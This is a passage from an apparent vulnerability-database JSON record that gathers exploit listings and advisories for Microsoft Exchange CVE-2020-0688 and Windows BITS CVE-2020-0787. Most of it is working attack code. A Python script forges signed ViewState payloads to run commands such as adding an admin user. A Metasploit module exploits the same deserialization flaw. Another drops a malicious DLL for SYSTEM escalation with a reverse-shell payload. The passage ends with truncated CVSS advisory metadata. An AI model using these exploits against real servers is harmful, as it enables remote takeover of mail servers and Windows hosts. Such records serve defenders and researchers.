JvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICA8L09iamVjdERhdGFQcm92aWRlcj4NCjwvUmVzb3VyY2VEaWN0aW9uYXJ5Pgs=') \n# This is a key installed in the Exchange Server, it is changeable, but often not (part of the vulnerability) \nstrSerKey = binascii.unhexlify('CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF') \n \ndef convertInt(iInput, length): \nreturn struct.pack(\"<I\" , int(iInput)).encode('hex')[:length] \n \ndef getYsoserialPayload(sCommand, sSessionId): \n## PART1 of the payload to hash \nstrPart1 = strSerTemplate.replace('###payload###', sCommand) \n## Fix the length fields \n#print(binascii.hexlify(strPart1[3]+strPart1[4])) ## 'da06' > '06da' (0x06b8 + len(sCommand)) \n#print(binascii.hexlify(strPart1[224]+strPart1[225])) ## 'fc04' > '04fc' (0x04da + len(sCommand)) \nstrLength1 = convertInt(0x06b8 + len(sCommand),4) \nstrLength2 = convertInt(0x04da + len(sCommand),4) \nstrPart1 = strPart1[:3] + binascii.unhexlify(strLength1) + strPart1[5:] \nstrPart1 = strPart1[:224] + binascii.unhexlify(strLength2) + strPart1[226:] \n \n## PART2 of the payload to hash \nstrPart2 = '274e7bb9' \nfor v in sSessionId: strPart2 += binascii.hexlify(v)+'00' \nstrPart2 = binascii.unhexlify(strPart2) \n \nstrMac = hmac.new(strSerKey, strPart1 + strPart2, hashlib.sha1).hexdigest() \nstrResult = base64.b64encode(strPart1 + binascii.unhexlify(strMac)) \nreturn strResult \n \ndef verifyLogin(sTarget, sUsername, sPassword, oOpener, oCookjar): \nif not sTarget[-1:] == '/': sTarget += '/' \n## Verify Login \nlPostData = {'destination' : sTarget, 'flags' : '4', 'forcedownlevel' : '0', 'username' : sUsername, 'password' : sPassword, 'passwordText' : '', 'isUtf8' : '1'} \ntry: sResult = oOpener.open(urllib2.Request(sTarget + 'owa/auth.owa', data=urllib.urlencode(lPostData), headers={'User-Agent':'Python'})).read() \nexcept: print('[!] Error, ' + sTarget + ' not reachable') \nbLoggedIn = False \nfor cookie in oCookjar: \nif cookie.name == 'cadata': bLoggedIn = True \nif not bLoggedIn: \nprint('[-] Login Wrong, too bad') \nexit(1) \nprint('[+] Login worked') \n \n## Verify Session ID \nsSessionId = '' \nsResult = oOpener.open(urllib2.Request(sTarget+'ecp/default.aspx', headers={'User-Agent':'Python'})).read() \nfor cookie in oCookjar: \nif 'SessionId' in cookie.name: sSessionId = cookie.value \nprint('[+] Got ASP.NET Session ID: ' + sSessionId) \n \n## Verify OWA Version \nsVersion = '' \ntry: sVersion = sResult.split('stylesheet')[0].split('href=\"')[1].split('/')[2] \nexcept: sVersion = 'favicon' \nif 'favicon' in sVersion: \nprint('[*] Problem, this user has never logged in before (wizard detected)') \nprint(' Please log in manually first at ' + sTarget + 'ecp/default.aspx') \nexit(1) \nprint('[+] Detected OWA version number '+sVersion) \n \n## Verify ViewStateValue \nsViewState = '' \ntry: sViewState = sResult.split('__VIEWSTATEGENERATOR')[2].split('value=\"')[1].split('\"')[0] \nexcept: pass \nif sViewState == 'B97B4E27': \nprint('[+] Vulnerable View State \"B97B4E27\" detected, this host is vulnerable!') \nelse: \nprint('[-] Error, viewstate wrong or not correctly parsed: '+sViewState) \nans = raw_input('[?] Still want to try the exploit? [y/N]: ') \nif ans == '' or ans.lower() == 'n': exit(1) \nreturn sSessionId, sTarget, sViewState \n \ndef main(): \nparser = argparse.ArgumentParser() \nparser.add_argument('-t', '--target', help='Target IP or hostname (e.g. https://owa.contoso.com)', default='') \nparser.add_argument('-u', '--username', help='Username (e.g. joe or joe@contoso.com)', default='') \nparser.add_argument('-p', '--password', help='Password (leave empty to ask for it)', default='') \nparser.add_argument('-c', '--command', help='Command to put behind \"cmd /c \" (e.g. net user pwned pwned /add)', default='') \nargs = parser.parse_args() \nif args.target == '' or args.username == '' or args.command == '': \nprint('[!] Example usage: ') \nprint(' ' + sys.argv[0] + ' -t https://owa.contoso.com -u joe -c \"net user pwned pwned /add\"') \nelse: \nif args.password == '': sPassword = getpass.getpass('[*] Please enter the password: ') \nelse: sPassword = args.password \nctx = ssl.create_default_context() \nctx.check_hostname = False \nctx.verify_mode = ssl.CERT_NONE \noCookjar = cookielib.CookieJar() \n#oProxy = urllib2.ProxyHandler({'http': '127.0.0.1:8080', 'https': '127.0.0.1:8080'}) \n#oOpener = urllib2.build_opener(urllib2.HTTPSHandler(context=ctx),urllib2.HTTPCookieProcessor(oCookjar),oProxy) \noOpener = urllib2.build_opener(urllib2.HTTPSHandler(context=ctx),urllib2.HTTPCookieProcessor(oCookjar)) \nsSessionId, sTarget, sViewState = verifyLogin(args.target, args.username, sPassword, oOpener, oCookjar) \nans = raw_input('[+] All looks OK, ready to send exploit (' + args.command + ')? [Y/n]: ') \nif ans.lower() == 'n': exit(0) \nsPayLoad = getYsoserialPayload(args.command, sSessionId) \nprint('[+] Got Payload: ' + sPayLoad) \nsURL = sTarget + 'ecp/default.aspx?__VIEWSTATEGENERATOR=' + sViewState + '&__VIEWSTATE=' + urllib.quote_plus(sPayLoad) \nprint(' Sending now ...') \ntry: oOpener.open(urllib2.Request(sURL, headers={'User-Agent':'Python'})) \nexcept urllib2.HTTPError, e: \nif e.code == '500': print('[+] This probably worked (Error Code 500 received)') \n \nif __name__ == \"__main__\": \nmain() \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/156592/msexchange2019-exec.txt", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-03-05T07:12:27", "description": "", "cvss3": {}, "published": "2020-03-04T00:00:00", "type": "packetstorm", "title": "Exchange Control Panel Viewstate Deserialization", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-0688"], "modified": "2020-03-04T00:00:00", "id": "PACKETSTORM:156620", "href": "https://packetstormsecurity.com/files/156620/Exchange-Control-Panel-Viewstate-Deserialization.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'bindata' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \n# include Msf::Auxiliary::Report \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \nDEFAULT_VIEWSTATE_GENERATOR = 'B97B4E27' \nVALIDATION_KEY = \"\\xcb\\x27\\x21\\xab\\xda\\xf8\\xe9\\xdc\\x51\\x6d\\x62\\x1d\\x8b\\x8b\\xf1\\x3a\\x2c\\x9e\\x86\\x89\\xa2\\x53\\x03\\xbf\" \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Exchange Control Panel Viewstate Deserialization', \n'Description' => %q{ \nThis module exploits a .NET serialization vulnerability in the \nExchange Control Panel (ECP) web page. The vulnerability is due to \nMicrosoft Exchange Server not randomizing the keys on a \nper-installation basis resulting in them using the same validationKey \nand decryptionKey values. With knowledge of these, values an attacker \ncan craft a special viewstate to cause an OS command to be executed \nby NT_AUTHORITY\\SYSTEM using .NET deserialization. \n}, \n'Author' => 'Spencer McIntyre', \n'License' => MSF_LICENSE, \n'References' => [ \n['CVE', '2020-0688'], \n['URL', 'https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys'], \n], \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows (x86)', { 'Arch' => ARCH_X86 } ], \n[ 'Windows (x64)', { 'Arch' => ARCH_X64 } ], \n[ 'Windows (cmd)', { 'Arch' => ARCH_CMD, 'Space' => 450 } ] \n], \n'DefaultOptions' => \n{ \n'SSL' => true \n}, \n'DefaultTarget' => 1, \n'DisclosureDate' => '2020-02-11', \n'Notes' => \n{ \n'Stability' => [ CRASH_SAFE, ], \n'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ], \n'Reliability' => [ REPEATABLE_SESSION, ], \n} \n)) \n \nregister_options([ \nOpt::RPORT(443), \nOptString.new('TARGETURI', [ true, 'The base path to the web application', '/' ]), \nOptString.new('USERNAME', [ true, 'Username to authenticate as', '' ]), \nOptString.new('PASSWORD', [ true, 'The password to authenticate with' ]) \n]) \n \nregister_advanced_options([ \nOptFloat.new('CMDSTAGER::DELAY', [ true, 'Delay between command executions', 0.5 ]), \n]) \nend \n \ndef check \nstate = get_request_setup \nviewstate = state[:viewstate] \nreturn CheckCode::Unknown if viewstate.nil? \n \nviewstate = Rex::Text.decode_base64(viewstate) \nbody = viewstate[0...-20] \nsignature = viewstate[-20..-1] \n \nunless generate_viewstate_signature(state[:viewstate_generator], state[:session_id], body) == signature \nreturn CheckCode::Safe \nend \n \n# we've validated the signature matches based on the data we have and thus \n# proven that we are capable of signing a viewstate ourselves \nCheckCode::Vulnerable \nend \n \ndef generate_viewstate(generator, session_id, cmd) \nviewstate = ::Msf::Util::DotNetDeserialization.generate(cmd) \nsignature = generate_viewstate_signature(generator, session_id, viewstate) \nRex::Text.encode_base64(viewstate + signature) \nend \n \ndef generate_viewstate_signature(generator, session_id, viewstate) \nmac_key_bytes = Rex::Text.hex_to_raw(generator).unpack('I<').pack('I>') \nmac_key_bytes << Rex::Text.to_unicode(session_id) \nOpenSSL::HMAC.digest(OpenSSL::Digest.new('sha1'), VALIDATION_KEY, viewstate + mac_key_bytes) \nend \n \ndef exploit \nstate = get_request_setup \n \n# the major limit is the max length of a GET request, the command will be \n# XML escaped and then base64 encoded which both increase the size \nif target.arch.first == ARCH_CMD \nexecute_command(payload.encoded, opts={state: state}) \nelse \ncmd_target = targets.select { |target| target.arch.include? ARCH_CMD }.first \nexecute_cmdstager({linemax: cmd_target.opts['Space'], delay: datastore['CMDSTAGER::DELAY'], state: state}) \nend \nend \n \ndef execute_command(cmd, opts) \nstate = opts[:state] \nviewstate = generate_viewstate(state[:viewstate_generator], state[:session_id], cmd) \n5.times do |iteration| \n# this request *must* be a GET request, can't use POST to use a larger viewstate \nsend_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'ecp', 'default.aspx'), \n'cookie' => state[:cookies].join(''), \n'agent' => state[:user_agent], \n'vars_get' => { \n'__VIEWSTATE' => viewstate, \n'__VIEWSTATEGENERATOR' => state[:viewstate_generator] \n} \n}) \nbreak \nrescue Rex::ConnectionError, Errno::ECONNRESET => e \nvprint_warning('Encountered a connection error while sending the command, sleeping before retrying') \nsleep iteration \nend \nend \n \ndef get_request_setup \n# need to use a newer default user-agent than what Metasploit currently provides \n# see: https://docs.microsoft.com/en-us/microsoft-edge/web-platform/user-agent-string \nuser_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.74 Safari/537.36 Edg/79.0.309.43' \nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'owa', 'auth.owa'), \n'method' => 'POST', \n'agent' => user_agent, \n'vars_post' => { \n'password' => datastore['PASSWORD'], \n'flags' => '4', \n'destination' => full_uri(normalize_uri(target_uri.path, 'owa')), \n'username' => datastore['USERNAME'] \n} \n}) \nfail_with(Failure::Unreachable, 'The initial HTTP request to the server failed') if res.nil? \ncookies = [res.get_cookies] \n \nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'ecp', 'default.aspx'), \n'cookie' => res.get_cookies, \n'agent' => user_agent \n}) \nfail_with(Failure::UnexpectedReply, 'Failed to get the __VIEWSTATEGENERATOR page') unless res && res.code == 200 \ncookies << res.get_cookies \n \nviewstate_generator = res.body.scan(/id=\"__VIEWSTATEGENERATOR\"\\s+value=\"([a-fA-F0-9]{8})\"/).flatten[0] \nif viewstate_generator.nil? \nprint_warning(\"Failed to find the __VIEWSTATEGENERATOR, using the default value: #{DEFAULT_VIEWSTATE_GENERATOR}\") \nviewstate_generator = DEFAULT_VIEWSTATE_GENERATOR \nelse \nvprint_status(\"Recovered the __VIEWSTATEGENERATOR: #{viewstate_generator}\") \nend \n \nviewstate = res.body.scan(/id=\"__VIEWSTATE\"\\s+value=\"([a-zA-Z0-9\\+\\/]+={0,2})\"/).flatten[0] \nif viewstate.nil? \nvprint_warning('Failed to find the __VIEWSTATE value') \nend \n \nsession_id = res.get_cookies.scan(/ASP\\.NET_SessionId=([\\w\\-]+);/).flatten[0] \nif session_id.nil? \nfail_with(Failure::UnexpectedReply, 'Failed to get the ASP.NET_SessionId from the response cookies') \nend \nvprint_status(\"Recovered the ASP.NET_SessionID: #{session_id}\") \n \n{user_agent: user_agent, cookies: cookies, viewstate: viewstate, viewstate_generator: viewstate_generator, session_id: session_id} \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/156620/exchange_ecp_viewstate.rb.txt", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-06-12T01:33:20", "description": "", "cvss3": {}, "published": "2020-06-11T00:00:00", "type": "packetstorm", "title": "Background Intelligent Transfer Service Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-0688", "CVE-2020-0787"], "modified": "2020-06-11T00:00:00", "id": "PACKETSTORM:158056", "href": "https://packetstormsecurity.com/files/158056/Background-Intelligent-Transfer-Service-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = ExcellentRanking \n \ninclude Msf::Post::Windows::Priv \ninclude Msf::Exploit::EXE # Needed for generate_payload_dll \ninclude Msf::Post::Windows::FileSystem \ninclude Msf::Post::Windows::ReflectiveDLLInjection \ninclude Msf::Exploit::FileDropper \ninclude Msf::Post::File \ninclude Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Background Intelligent Transfer Service Arbitrary File Move Privilege Elevation Vulnerability', \n'Description' => %q{ \nThis module exploits CVE-2020-0787, an arbitrary file move vulnerability in outdated versions of the \nBackground Intelligent Transfer Service (BITS), to overwrite C:\\Windows\\System32\\WindowsCoreDeviceInfo.dll \nwith a malicious DLL containing the attacker's payload. \n \nTo achieve code execution as the SYSTEM user, the Update Session Orchestrator service is then started, which \nwill result in the malicious WindowsCoreDeviceInfo.dll being run with SYSTEM privileges due to a DLL hijacking \nissue within the Update Session Orchestrator Service. \n \nNote that presently this module only works on Windows 10 and Windows Server 2016 and later as the \nUpdate Session Orchestrator Service was only introduced in Windows 10. Note that only Windows 10 has been tested, \nso your mileage may vary on Windows Server 2016 and later. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'itm4n', # PoC \n'gwillcox-r7' # msf module \n], \n'Platform' => ['win'], \n'SessionTypes' => ['meterpreter'], \n'Privileged' => true, \n'Arch' => [ARCH_X86, ARCH_X64], \n'Targets' => \n[ \n[ 'Windows DLL Dropper', { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :windows_dropper } ], \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => '2020-03-10', \n'References' => \n[ \n['CVE', '2020-0787'], \n['URL', 'https://itm4n.github.io/cve-2020-0787-windows-bits-eop/'], \n['URL', 'https://github.com/itm4n/BitsArbitraryFileMove'], \n['URL', 'https://attackerkb.com/assessments/e61cfec0-d766-4e7e-89f7-5aad2460afb8'], \n['URL', 'https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html'], \n['URL', 'https://itm4n.github.io/usodllloader-part1/'], \n['URL', 'https://itm4n.github.io/usodllloader-part2/'], \n], \n'Notes' => \n{ \n'SideEffects' => [ ARTIFACTS_ON_DISK ], \n'Reliability' => [ REPEATABLE_SESSION ], \n'Stability' => [ CRASH_SAFE ] \n}, \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp', \n'WfsDelay' => 900 \n} \n) \n) \n \nregister_options([ \nOptBool.new('OVERWRITE_DLL', [true, 'Overwrite WindowsCoreDeviceInfo.dll if it exists (false by default).', false]), \nOptInt.new('JOB_WAIT_TIME', [true, 'Time to wait for the BITS job to complete before starting the USO service to execute the uploaded payload, in seconds', 20]) \n]) \nend \n \ndef target_not_presently_supported \nprint_warning('This target is not presently supported by this exploit. Support may be added in the future!') \nprint_warning('Attempts to exploit this target with this module WILL NOT WORK!') \nend \n \ndef check \nsysinfo_value = sysinfo['OS'] \n \nif sysinfo_value !~ /windows/i \n# Non-Windows systems are definitely not affected. \nreturn CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!') \nend \n \n# XXX Using session.shell_command_token over cmd_exec() here as @wvu-r7 noticed cmd_exec() was broken under some situations. \nbuild_num_raw = session.shell_command_token('cmd.exe /c ver') \nbuild_num = build_num_raw.match(/\\d+\\.\\d+\\.\\d+\\.\\d+/) \nif build_num.nil? \nprint_error(\"Couldn't retrieve the target's build number!\") \nelse \nbuild_num = build_num_raw.match(/\\d+\\.\\d+\\.\\d+\\.\\d+/)[0] \nprint_status(\"Target's build number: #{build_num}\") \nend \n \n# see https://docs.microsoft.com/en-us/windows/release-information/ \nunless sysinfo_value =~ /(7|8|8\\.1|10|2008|2012|2016|2019|1803|1903)/ \nreturn CheckCode::Safe('Target is not running a vulnerable version of Windows!') \nend \n \nbuild_num_gemversion = Gem::Version.new(build_num) \n \n# Build numbers taken from https://www.qualys.com/research/security-alerts/2020-03-10/microsoft/ \nif (build_num_gemversion >= Gem::Version.new('10.0.18363.0')) && (build_num_gemversion < Gem::Version.new('10.0.18363.719')) # Windows 10 v1909 \nreturn CheckCode::Appears('Vulnerable Windows 10 v1909 build detected!') \nelsif (build_num_gemversion >= Gem::Version.new('10.0.18362.0')) && (build_num_gemversion < Gem::Version.new('10.0.18362.719')) # Windows 10 v1903 \nreturn CheckCode::Appears('Vulnerable Windows 10 v1903 build detected!') \nelsif (build_num_gemversion >= Gem::Version.new('10.0.17763.0')) && (build_num_gemversion < Gem::Version.new('10.0.17763.1098')) # Windows 10 v1809 \nreturn CheckCode::Appears('Vulnerable Windows 10 v1809 build detected!') \nelsif (build_num_gemversion >= Gem::Version.new('10.0.17134.0')) && (build_num_gemversion < Gem::Version.new('10.0.17134.1365')) # Windows 10 v1803 \nreturn CheckCode::Appears('Vulnerable Windows 10 v1803 build detected!') \nelsif (build_num_gemversion >= Gem::Version.new('10.0.16299.0')) && (build_num_gemversion < Gem::Version.new('10.0.16299.1747')) # Windows 10 v1709 \nreturn CheckCode::Appears('Vulnerable Windows 10 v1709 build detected!') \nelsif (build_num_gemversion >= Gem::Version.new('10.0.15063.0')) && (build_num_gemversion < Gem::Version.new('10.0.15063.2313')) # Windows 10 v1703 \nreturn CheckCode::Appears('Vulnerable Windows 10 v1703 build detected!') \nelsif (build_num_gemversion >= Gem::Version.new('10.0.14393.0')) && (build_num_gemversion < Gem::Version.new('10.0.14393.3564')) # Windows 10 v1607 \nreturn CheckCode::Appears('Vulnerable Windows 10 v1607 build detected!') \nelsif (build_num_gemversion >= Gem::Version.new('10.0.10586.0')) && (build_num_gemversion < Gem::Version.new('10.0.10586.9999999')) # Windows 10 v1511 \nreturn CheckCode::Appears('Vulnerable Windows 10 v1511 build detected!') \nelsif (build_num_gemversion >= Gem::Version.new('10.0.10240.0')) && (build_num_gemversion < Gem::Version.new('10.0.10240.18519')) # Windows 10 v1507 \nreturn CheckCode::Appears('Vulnerable Windows 10 v1507 build detected!') \nelsif (build_num_gemversion >= Gem::Version.new('6.3.9600.0')) && (build_num_gemversion < Gem::Version.new('6.3.9600.19665')) # Windows 8.1/Windows Server 2012 R2 \ntarget_not_presently_supported \nreturn CheckCode::Appears('Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!') \nelsif (build_num_gemversion >= Gem::Version.new('6.2.9200.0')) && (build_num_gemversion < Gem::Version.new('6.2.9200.23009')) # Windows 8/Windows Server 2012 \ntarget_not_presently_supported \nreturn CheckCode::AppearsAppears('Vulnerable Windows 8/Windows Server 2012 build detected!') \nelsif (build_num_gemversion >= Gem::Version.new('6.1.7600.0')) && (build_num_gemversion < Gem::Version.new('6.1.7601.24549')) # Windows 7/Windows Server 2008 R2 \ntarget_not_presently_supported \nreturn CheckCode::Appears('Vulnerable Windows 7/Windows Server 2008 R2 build detected!') \nelsif (build_num_gemversion >= Gem::Version.new('6.0.6001.0')) && (build_num_gemversion < Gem::Version.new('6.0.6003.20749')) # Windows Server 2008/Windows Server 2008 SP2 \ntarget_not_presently_supported \nreturn CheckCode::Appears('Windows Server 2008/Windows Server 2008 SP2 build detected!') \nelse \nreturn CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!') \nend \nend \n \ndef check_target_is_running_supported_windows_version \nif sysinfo['OS'].match('Windows').nil? \nfail_with(Failure::NotVulnerable, 'Target is not running Windows!') \nelsif sysinfo['OS'].match('Windows 10').nil? && sysinfo['OS'].match('Windows Server 2016').nil? && sysinfo['OS'].match('Windows Server 2019').nil? \nfail_with(Failure::BadConfig, 'Target is running Windows, its not a version this module supports! Bailing...') \nend \nend \n \ndef check_target_and_payload_match_and_supported(client_arch) \nif (client_arch != ARCH_X64) && (client_arch != ARCH_X86) \nfail_with(Failure::BadConfig, 'This exploit currently only supports x86 and x64 targets!') \nend \npayload_arch = payload.arch.first # TODO: Add missing documentation for payload.arch, @wvu used this first but it is not documented anywhere. \nif (payload_arch != ARCH_X64) && (payload_arch != ARCH_X86) \nfail_with(Failure::BadConfig, \"Unsupported payload architecture (#{payload_arch})\") # Unsupported architecture, so return an error. \nend \nif ((client_arch == ARCH_X64) && (payload_arch != ARCH_X64)) || ((client_arch == ARCH_X86) && (payload_arch != ARCH_X86)) \nfail_with(Failure::BadConfig, \"Payload architecture (#{payload_arch}) doesn't match the architecture of the target (#{client_arch})!\") \nend \nend \n \ndef check_windowscoredeviceinfo_dll_exists_on_target \n# Taken from bwatters-r7's cve-2020-0688_service_tracing.rb code. \n# \n# We are going to overwrite the WindowsCoreDeviceInfo.dll DLL as part of our exploit. \n# The second part of this exploit will trigger a Update Session to be created so that this DLL \n# is loaded, which will result in arbitrary code execution as SYSTEM. \n# \n# To prevent any errors, we will first check that this file doesn't exist and ask the user if they are sure \n# that they want to overwrite the file. \nwin_dir = session.sys.config.getenv('windir') \nnormal_target_payload_pathname = \"#{win_dir}\\\\System32\\\\WindowsCoreDeviceInfo.dll\" \nwow64_target_payload_pathname = \"#{win_dir}\\\\Sysnative\\\\WindowsCoreDeviceInfo.dll\" \nwow64_existing_file = \"#{win_dir}\\\\Sysnative\\\\win32k.sys\" \nif file?(wow64_existing_file) \nif file?(wow64_target_payload_pathname) \nprint_warning(\"#{wow64_target_payload_pathname} already exists\") \nprint_warning('If it is in use, the overwrite will fail') \nunless datastore['OVERWRITE_DLL'] \nprint_error('Change OVERWRITE_DLL option to true if you would like to proceed.') \nfail_with(Failure::BadConfig, \"#{wow64_target_payload_pathname} already exists and OVERWRITE_DLL option is false\") \nend \nend \ntarget_payload_pathname = wow64_target_payload_pathname \nelsif file?(normal_target_payload_pathname) \nprint_warning(\"#{normal_target_payload_pathname} already exists\") \nprint_warning('If it is in use, the overwrite will fail') \nunless datastore['OVERWRITE_DLL'] \nprint_error('Change OVERWRITE_DLL option to true if you would like to proceed.') \nfail_with(Failure::BadConfig, \"#{normal_target_payload_pathname} already exists and OVERWRITE_DLL option is false\") \nend \ntarget_payload_pathname = normal_target_payload_pathname \nend \ntarget_payload_pathname \nend \n \ndef launch_background_injectable_notepad \nprint_status('Launching notepad to host the exploit...') \nnotepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true) \nprocess = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS) \nprint_good(\"Process #{process.pid} launched.\") \nprocess \nrescue Rex::Post::Meterpreter::RequestError \n# Sandboxes could not allow to create a new process \n# stdapi_sys_process_execute: Operation failed: Access is denied. \nprint_error('Operation failed. Trying to elevate the current process...') \nprocess = client.sys.process.open \nprocess \nend \n \ndef exploit \n# NOTE: Automatic check is implemented by the AutoCheck mixin \nsuper \n \n# Step 1: Check target environment is correct. \nprint_status('Step #1: Checking target environment...') \nif is_system? \nfail_with(Failure::None, 'Session is already elevated') \nend \nclient_arch = sysinfo['Architecture'] \ncheck_target_is_running_supported_windows_version \ncheck_target_and_payload_match_and_supported(client_arch) \ncheck_windowscoredeviceinfo_dll_exists_on_target \n \n# Step 2: Generate the malicious DLL and upload it to a temp location. \nprint_status('Step #2: Generating the malicious DLL...') \npath = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0787') \ndatastore['EXE::Path'] = path \nif client_arch =~ /x86/i \ndatastore['EXE::Template'] = ::File.join(path, 'template_x86_windows.dll') \nlibrary_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0787', 'CVE-2020-0787.x86.dll') \nlibrary_path = ::File.expand_path(library_path) \nelsif client_arch =~ /x64/i \ndatastore['EXE::Template'] = ::File.join(path, 'template_x64_windows.dll') \nlibrary_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0787', 'CVE-2020-0787.x64.dll') \nlibrary_path = ::File.expand_path(library_path) \nend \n \npayload_dll = generate_payload_dll \nprint_status(\"Payload DLL is #{payload_dll.length} bytes long\") \ntemp_directory = session.sys.config.getenv('%TEMP%') \nmalicious_dll_location = \"#{temp_directory}\\\\\" + Rex::Text.rand_text_alpha(6..13) + '.dll' \nwrite_file(malicious_dll_location, payload_dll) \nregister_file_for_cleanup(malicious_dll_location) \n \n# Step 3: Load the main DLL that will trigger the exploit and conduct the arbitrary file copy. \nprint_status('Step #3: Loading the exploit DLL to run the main exploit...') \nprocess = launch_background_injectable_notepad \n \nprint_status(\"Injecting DLL into #{process.pid}...\") \nexploit_mem, offset = inject_dll_into_process(process, library_path) \n \ndll_info_parameter = malicious_dll_location.to_s \npayload_mem = inject_into_process(process, dll_info_parameter) \n \n# invoke the exploit, passing in the address of the payload that \n# we want invoked on successful exploitation. \nprint_status('DLL injected. Executing injected DLL...') \nprocess.thread.create(exploit_mem + offset, payload_mem) \n \nprint_status(\"Sleeping for #{datastore['JOB_WAIT_TIME']} seconds to allow the exploit to run...\") \nsleep datastore['JOB_WAIT_TIME'] \n \nregister_file_for_cleanup('C:\\\\Windows\\\\System32\\\\WindowsCoreDeviceInfo.dll') # Register this file for cleanup so that if we fail, then the file is cleaned up. \n# Normally we can't delete this file though as there will be a SYSTEM service that has a handle to this file. \n \nprint_status(\"Starting the interactive scan job...\") \n# Step 4: Execute `usoclient StartInteractiveScan` to trigger the payload \n# XXX Using session.shell_command_token over cmd_exec() here as @wvu-r7 noticed cmd_exec() was broken under some situations. \nsession.shell_command_token('usoclient StartInteractiveScan') \n \nprint_status(\"Enjoy the shell!\") \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/158056/cve_2020_0787_bits_arbitrary_file_move.rb.txt", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:37:52", "description": "A memory corruption vulnerability exists in Microsoft Exchange. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-09-21T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Exchange Memory Corruption (CVE-2020-16875)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16875"], "modified": "2020-09-21T00:00:00", "id": "CPAI-2020-0870", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-02-16T19:40:35", "description": "A remote code execution vulnerability exists in Microsoft Exchange Server. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-03-01T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Exchange Server Remote Code Execution (CVE-2020-0688)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": 